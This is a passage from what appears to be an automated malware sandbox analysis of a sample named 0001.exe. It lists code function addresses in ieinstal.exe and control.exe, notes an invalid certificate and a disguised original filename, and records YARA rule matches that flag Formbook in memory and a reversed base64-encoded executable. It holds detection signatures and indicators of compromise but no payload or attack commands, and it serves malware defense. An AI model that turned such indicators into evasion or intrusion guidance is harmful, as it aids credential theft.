          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DB10024_2_04DB1002
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D1A8304_2_04D1A830
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DCE8244_2_04DCE824
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D199BF4_2_04D199BF
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04CFF9004_2_04CFF900
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D141204_2_04D14120
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DB4AEF4_2_04DB4AEF
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DC22AE4_2_04DC22AE
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D1B2364_2_04D1B236
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DAFA2B4_2_04DAFA2B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DB03DA4_2_04DB03DA
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DBDBD24_2_04DBDBD2
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D2ABD84_2_04D2ABD8
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DA23E34_2_04DA23E3
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D1EB9A4_2_04D1EB9A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D2138B4_2_04D2138B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D2EBB04_2_04D2EBB0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D1AB404_2_04D1AB40
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D9CB4F4_2_04D9CB4F
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04D1A3094_2_04D1A309
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_04DC2B284_2_04DC2B28
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_104110304_2_10411030
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042CA464_2_1042CA46
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042DA5E4_2_1042DA5E
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042D29D4_2_1042D29D
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042CB3E4_2_1042CB3E
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042D4B34_2_1042D4B3
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10412D904_2_10412D90
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042DFE64_2_1042DFE6
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042D7F94_2_1042D7F9
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10419F804_2_10419F80
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10412FB04_2_10412FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA449614_2_04AA4496
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_049F841F14_2_049F841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AAD46614_2_04AAD466
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0B47714_2_04A0B477
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A165A014_2_04A165A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A1258114_2_04A12581
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA2D8214_2_04AA2D82
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB25DD14_2_04AB25DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_049FD5E014_2_049FD5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB2D0714_2_04AB2D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_049E0D2014_2_049E0D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB1D5514_2_04AB1D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A91EB614_2_04A91EB6
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB2EF714_2_04AB2EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A06E3014_2_04A06E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0560014_2_04A05600
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AAD61614_2_04AAD616
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB1FF114_2_04AB1FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04ABDFCE14_2_04ABDFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A120A014_2_04A120A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB20A814_2_04AB20A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_049FB09014_2_049FB090
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB28EC14_2_04AB28EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04ABE82414_2_04ABE824
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0A83014_2_04A0A830
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA100214_2_04AA1002
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A099BF14_2_04A099BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0412014_2_04A04120
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_049EF90014_2_049EF900
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB22AE14_2_04AB22AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA4AEF14_2_04AA4AEF
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A9FA2B14_2_04A9FA2B
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0B23614_2_04A0B236
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A1EBB014_2_04A1EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A1138B14_2_04A1138B
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0EB9A14_2_04A0EB9A
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A923E314_2_04A923E3
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA03DA14_2_04AA03DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AADBD214_2_04AADBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A1ABD814_2_04A1ABD8
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB2B2814_2_04AB2B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0A30914_2_04A0A309
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA231B14_2_04AA231B
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0AB4014_2_04A0AB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A8CB4F14_2_04A8CB4F
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007BDA5E14_2_007BDA5E
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007BCA4614_2_007BCA46
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007BD4B314_2_007BD4B3
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007A2D9014_2_007A2D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007BD7F914_2_007BD7F9
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007BDFE614_2_007BDFE6
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007A2FB014_2_007A2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_007A9F8014_2_007A9F80
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 049EB150 appears 145 times
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 04CFB150 appears 145 times
          Source: 0001.exeStatic PE information: invalid certificate
          Source: 0001.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: 0001.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 0001.exe, 00000000.00000000.231077348.00000000004B1000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameProcexp.exeB vs 0001.exe
          Source: 0001.exeBinary or memory string: OriginalFilenameProcexp.exeB vs 0001.exe
          Source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.243293381.000000000434C000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.243344552.000000000434C000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.234141270.000000000434C000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.243422132.000000000434C000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.233441709.00000000042D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.234084975.000000000434C000.00000004.00000001.sdmp, type: MEMORY